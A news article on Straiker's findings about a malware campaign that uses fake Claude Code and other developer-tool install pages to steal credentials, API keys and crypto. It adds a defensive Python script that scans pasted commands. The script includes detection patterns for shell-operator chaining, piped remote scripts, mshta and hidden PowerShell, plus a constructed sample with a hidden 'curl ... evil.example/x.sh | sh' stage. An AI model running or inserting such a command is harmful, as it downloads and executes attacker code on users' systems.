Straiker researchers say they have uncovered an active malware operation that uses fake installer and documentation pages for Claude Code and other developer tools to trick users into running malicious code. The campaign, which also imitates JetBrains, NotebookLM, Cline and other AI-related products, is designed to steal browser credentials, API keys, password vault data and cryptocurrency funds.
The company said the campaign has been running since March 2026 and was still active in mid-May, with 32 of 88 tracked domains still serving content at that point. Straiker also found that the operation keeps shifting infrastructure, including new GitHub Pages domains, making takedown efforts harder.
According to Straiker, the attackers appear to be relying on search engine manipulation and paid Google ads to place fake sites in front of developers looking for installation instructions. The lure is especially effective because AI coding tools often require users to copy commands from a web page into a terminal, which can make malicious instructions look routine.
The researchers described the pages as convincing replicas of real product documentation. In one case, the campaign used a domain identified as ravishingtattle[.]com to deliver the malware chain. Straiker said the sites were built to look legitimate enough that a user might not notice anything unusual before pasting a command that launches the infection.
Straiker said the operation is notable because it targets AI-specific assets, including credentials for tools such as Cline and Continue.dev. The company described the campaign as one of the first it has seen built specifically to harvest AI developer credentials rather than only traditional browser data and crypto wallets.
The attackers use several delivery techniques across the campaign. Straiker said one variant hides a malicious command behind a shell operator that can make the payload harder to spot. Other paths include multi-stage PowerShell activity, mshta-based delivery and trojanized installers. One variant reportedly delivers PlugX, while another uses a stealer family that the firm tracks as ACRStealer.
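The copy-and-paste lure above and the operator-hidden second stage both turn on what a developer actually hands to the shell versus what the web page shows. As an added example (not code from Straiker's report, and the patterns are assumptions rather than published indicators), this Python pre-paste check flags the tricks those delivery styles rely on: a command chained behind a shell operator, a trailing stage pushed out of view by whitespace, zero-width or bidi format characters, remote scripts executed without inspection, mshta launches and PowerShell stages; the sample commands and `evil.example` host are constructed.

```python
import re
import unicodedata

# Heuristics for triaging an install command copied from a web page before it is run.
# The patterns are assumptions for this example, not indicators from Straiker's report;
# they target the delivery styles the report names: a second command hidden behind a
# shell operator, multi-stage PowerShell, and mshta launches.
SUSPICIOUS_PATTERNS = [
    ("command chained behind a shell operator",
     re.compile(r"(\|\||&&|;)\s*\S")),
    ("remote script executed without inspection",
     re.compile(r"\b(curl|wget|iwr|Invoke-WebRequest)\b.*\|\s*(ba|z)?sh\b"
                r"|\biex\b|Invoke-Expression", re.I)),
    ("mshta launching content",
     re.compile(r"\bmshta(\.exe)?\b", re.I)),
    ("powershell with hidden window, bypassed policy or encoded command",
     re.compile(r"powershell.*?(-w(indowstyle)?\s+hidden|-e(p|xecutionpolicy)\s+bypass|-enc\w*)",
                re.I)),
    ("base64 payload decoded at run time",
     re.compile(r"base64\s+(-d|--decode)|FromBase64String", re.I)),
]


def triage_pasted_command(text: str) -> list[str]:
    """Return human-readable findings for a command string about to be pasted.

    Findings are prompts to inspect the command, not a verdict: legitimate
    installers also chain commands, so only an empty list means nothing was flagged.
    """
    findings = []
    # Zero-width or bidi format characters can hide or reorder parts of a command
    # so the rendered page shows something other than what the shell receives.
    if any(unicodedata.category(c) in ("Cf", "Cc") and c not in "\n\r\t" for c in text):
        findings.append("hidden control or format characters present")
    # A long whitespace run pushes a trailing command past the visible edge of a code box.
    if re.search(r"[ \t]{40,}", text):
        findings.append("long whitespace run that may push a command out of view")
    for name, pattern in SUSPICIOUS_PATTERNS:
        if pattern.search(text):
            findings.append(name)
    return findings


if __name__ == "__main__":
    # Constructed samples: a benign install line and a lookalike with a hidden second stage.
    benign = "npm install -g example-cli"
    hidden_stage = benign + " " * 60 + "; curl -s http://evil.example/x.sh | sh"
    for sample in (benign, hidden_stage):
        print(repr(sample[:40]), "->", triage_pasted_command(sample) or "no findings")
```

Wiring this into a clipboard or terminal paste hook is platform-specific and left out; the function only needs the raw text that would reach the shell.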
Straiker said the malware stages include anti-analysis checks, in-memory payload loading, and encrypted command-and-control communications. The company also reported that parts of the operation use WebDAV, Telegraph dead drops and Binance Smart Chain smart contracts to route traffic or hide infrastructure. In one case, Straiker said the crypto-clipper component uses a blockchain smart contract for command-and-control, which reduces the usefulness of traditional domain takedowns.
The researchers also described a Rust-compiled clipper that targets more than 20 blockchains. That tool is intended to intercept cryptocurrency transfers and replace destination wallet addresses with attacker-controlled addresses.
Straiker framed the campaign as a warning for developers who increasingly rely on AI coding assistants and related tools. The trust built into those workflows can become a weakness if attackers can persuade users to copy commands from a counterfeit website.
The company said the broader lesson is that AI tool adoption has created a new phishing surface. Developers are not only being asked for browser passwords or cloud logins, but also for API tokens and access to tooling that may connect directly to source code, deployment systems or payment rails.
Straiker published technical indicators and analysis to help defenders spot the campaign. Its findings suggest the operation is both persistent and adaptable, with enough infrastructure still online to continue reaching users even as individual domains are identified.